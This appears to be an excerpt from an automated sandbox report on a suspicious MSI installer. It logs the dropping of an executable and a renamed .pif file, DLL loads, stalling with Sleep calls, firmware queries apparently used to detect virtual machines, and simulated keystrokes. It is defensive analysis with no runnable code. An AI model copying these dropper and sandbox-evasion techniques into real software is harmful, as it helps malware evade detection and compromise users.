Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.ui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windowmanagementapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: inputhost.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.ui.immersive.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: C:\Windows\System32\msiexec.exe	Automated click: Next >
Source: C:\Windows\System32\msiexec.exe	Automated click: Next >
Source: C:\Windows\System32\msiexec.exe	Automated click: Install
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: NB4EASbynx.msi

Static file information: File size 2580992 > 1048576

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: MSI53B9.tmp, 00000004.00000000.2201198694.00000000008A0000.00000002.00000001.01000000.00000003.sdmp, MSI53B9.tmp, 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmp, NB4EASbynx.msi, 68e8f1.msi.2.dr, MSI53B9.tmp.1.dr, 68e8ef.msi.2.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: NB4EASbynx.msi, MSIEA95.tmp.2.dr, MSIC706.tmp.1.dr, MSI52AE.tmp.1.dr, 68e8f1.msi.2.dr, MSI527E.tmp.1.dr, MSI523E.tmp.1.dr, MSIEAB6.tmp.2.dr, MSI4F6E.tmp.1.dr, MSI5124.tmp.1.dr

Source: C:\Users\user\Desktop\SymposiumTaiwan.exe

Code function: 8_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

8_2_00406328

Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp

File created: C:\Users\user\Desktop\__tmp_rar_sfx_access_check_6837546

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Code function: 4_2_0088D8B6 push ecx; ret	4_2_0088D8C9
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Code function: 4_2_0088CDF0 push eax; ret	4_2_0088CE0E
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_00058B75 push ecx; ret	19_2_00058B88
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_0004CBDB push eax; retf	19_2_0004CBF8
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00058B75 push ecx; ret	23_2_00058B88
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_0004CBDB push eax; retf	23_2_0004CBF8
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00E9F23A push eax; ret	23_2_00E9F23D
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00EA299E push ss; iretd	23_2_00EA2A21
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00EA2AAE pushad ; iretd	23_2_00EA2AC5
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00EA2A42 push ss; iretd	23_2_00EA2A55
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00EA2A22 push ss; iretd	23_2_00EA2A25
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00EA2A32 pushad ; iretd	23_2_00EA2A35
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00EA3EC4 push esp; iretd	23_2_00EA3EC5

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif

Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSI523E.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIEA27.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSI52AE.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	File created: C:\Users\user\Desktop\SymposiumTaiwan.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSI537A.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIEA95.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSI5124.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSI527E.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIEAB6.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSIC706.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSI4F6E.tmp	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIEA27.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIEA95.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIEAB6.tmp	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_000B59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	19_2_000B59B3
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_00045EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	19_2_00045EDA
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_000B59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	23_2_000B59B3
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00045EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	23_2_00045EDA

Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif

Code function: 19_2_000533B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

19_2_000533B7

Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SymposiumTaiwan.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SymposiumTaiwan.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SymposiumTaiwan.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SymposiumTaiwan.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SymposiumTaiwan.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SymposiumTaiwan.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SymposiumTaiwan.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SymposiumTaiwan.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SymposiumTaiwan.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SymposiumTaiwan.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SymposiumTaiwan.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SymposiumTaiwan.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found stalling execution ending in API Sleep call

Source: C:\Users\user\Desktop\SymposiumTaiwan.exe

Stalling execution: Execution stalls by calling Sleep

graph_8-3879

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI523E.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIEA27.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI52AE.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI537A.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIEA95.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI5124.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI527E.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIEAB6.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI4F6E.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIC706.tmp	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	API coverage: 6.6 %
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	API coverage: 0.6 %

Source: C:\Windows\SysWOW64\timeout.exe TID: 3424	Thread sleep count: 42 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif TID: 6260	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif TID: 5476	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Code function: 4_2_0087A273 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	4_2_0087A273
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Code function: 4_2_0088A537 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	4_2_0088A537
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Code function: 4_2_00897D78 FindFirstFileExA,	4_2_00897D78
Source: C:\Users\user\Desktop\SymposiumTaiwan.exe	Code function: 8_2_00406301 FindFirstFileW,FindClose,	8_2_00406301
Source: C:\Users\user\Desktop\SymposiumTaiwan.exe	Code function: 8_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	8_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_00094005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	19_2_00094005
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_0009494A GetFileAttributesW,FindFirstFileW,FindClose,	19_2_0009494A
